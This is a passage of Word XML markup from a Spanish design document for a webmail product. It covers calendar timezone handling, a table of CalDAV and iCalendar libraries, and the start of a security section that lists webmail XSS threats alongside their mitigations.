        <w:t xml:space="preserve">en UTC (sufijo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). La zona horaria del usuario se obtiene de la configuración de perfil (por defecto, la zona horaria del navegador detectada vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intl.DateTimeFormat().resolvedOptions().timeZone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Para visualización, FullCalendar recibe los eventos en UTC y aplica la zona horaria local del usuario mediante el plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@fullcalendar/moment-timezone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cuando un evento se crea o modifica, el composer de eventos muestra un selector de timezone que defaultea a la zona del usuario pero permite cambiar explícitamente. Al guardar, la fecha/hora seleccionada se convierte a UTC para almacenamiento. En el iCalendar exportado vía CalDAV o adjunto .ics, se incluye un bloque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VTIMEZONE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con la definición IANA completa para compatibilidad con clientes que requieren</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VTIMEZONE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">explícito (Outlook, Apple Calendar).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La base de datos de zonas horarias IANA se mantiene actualizada mediante el paquete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ical.timezones.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que proporciona definiciones</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VTIMEZONE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para todas las zonas IANA. Este paquete se actualiza automáticamente con cada release que incorpora los cambios de la Olson TZ Database (actualizaciones por cambios de horario de verano en jurisdicciones mundiales).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1827"/>
        <w:gridCol w:w="3350"/>
        <w:gridCol w:w="1370"/>
        <w:gridCol w:w="1370"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Componente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Librería / Tecnología</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Versión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cliente CalDAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">tsdav</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^2.1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cliente TypeScript para CalDAV/CardDAV/WebDAV con OAuth2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[190]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parser iCalendar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ical.js (Mozilla)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^2.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parsing/generación RFC 5545, jCal, sin dependencias</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[197]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Expansión RRULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">node-ical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^0.18.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fork de ical.js con expansión robusta de recurrencias</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[189]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UI Calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FullCalendar Vue 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^6.1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Componente calendario con vistas día/semana/mes/agenda</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[130]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Plugin iCal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">@fullcalendar/icalendar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^6.1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Soporte nativo de feeds iCalendar en FullCalendar</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[242]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Timezones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ical.timezones.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^1.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Base de datos IANA para VTIMEZONE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[158]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Auto-discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RFC 6764</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DNS SRV + well-known + PROPFIND</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[232]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OAuth 2.0 + Basic/Digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RFC 6749</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OAuth2 para Google/iCloud, Basic para self-hosted</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[152]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sync incremental</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ETag + sync-token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RFC 6578</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Detección eficiente de cambios sin descarga completa</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[226]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Invitaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">iTip (RFC 5546)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Flujo REQUEST/REPLY/CANCEL para invitaciones</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[227]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Colas de sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">BullMQ 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">^5.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jobs de expansión RRULE y sync periódico en background</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:id="154" w:name="seguridad-defensa-en-capas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Seguridad: Defensa en Capas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El historial reciente de vulnerabilidades en clientes webmail establece un escenario de amenaza que no admite compromisos. Roundcube acumuló más de 15 CVE durante el primer semestre de 2026, incluyendo explotación activa por el grupo APT28 (Fancy Bear) vinculado al Kremlin, quienes mediante la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Operación RoundPress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">insertaron JavaScript malicioso en correos HTML para exfiltrar contactos, reenviar mensajes y establecer reglas Sieve persistentes que sobrevivían a cambios de contraseña</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[55]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CVE-2026-35539 demostró XSS a través de adjuntos HTML con puntuación CVSS 6.1 — bastaba con previsualizar un archivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para que el ataque se ejecutara</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[76]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[79]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Zimbra, por su parte, mantuvo más de 10.500 servidores sin parchear ante CVE-2025-48700, una vulnerabilidad de XSS almacenado que se activaba simplemente al visualizar un correo manipulado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[51]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estos incidentes comparten una causa raíz común: la renderización de contenido HTML no confiable sin sanitización adecuada en múltiples capas. Webmail 6.0 aborda este problema mediante una arquitectura de defensa en profundidad que nunca depende de un único mecanismo de protección.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="141" w:name="matriz-de-amenazas-y-mitigaciones"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 Matriz de Amenazas y Mitigaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La siguiente tabla consolida las ocho clases de amenaza principales identificadas para un cliente webmail moderno, con su vector de ataque, impacto estimado y las contramedidas específicas que Webmail 6.0 implementa.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1056"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="2904"/>
        <w:gridCol w:w="1584"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Amenaza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mitigación Webmail 6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Referencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS via email HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Adjunto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">text/html</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">o cuerpo de correo con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, handlers inline, SVG</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;animate&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Robo de sesión, keylogging, CSRF forzado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOMPurify server-side + CSP estricto (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nonce</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">strict-dynamic</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) + iframe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-35539 CVSS 6.1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[76]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; APT28</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[55]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CSS malicioso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@import</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con URL externa, selectores que exfiltran datos vía requests GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exfiltración de contenido, UI redressing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Juice (CSS inlining) + whitelist de propiedades permitidas, bloqueo de</w:t>
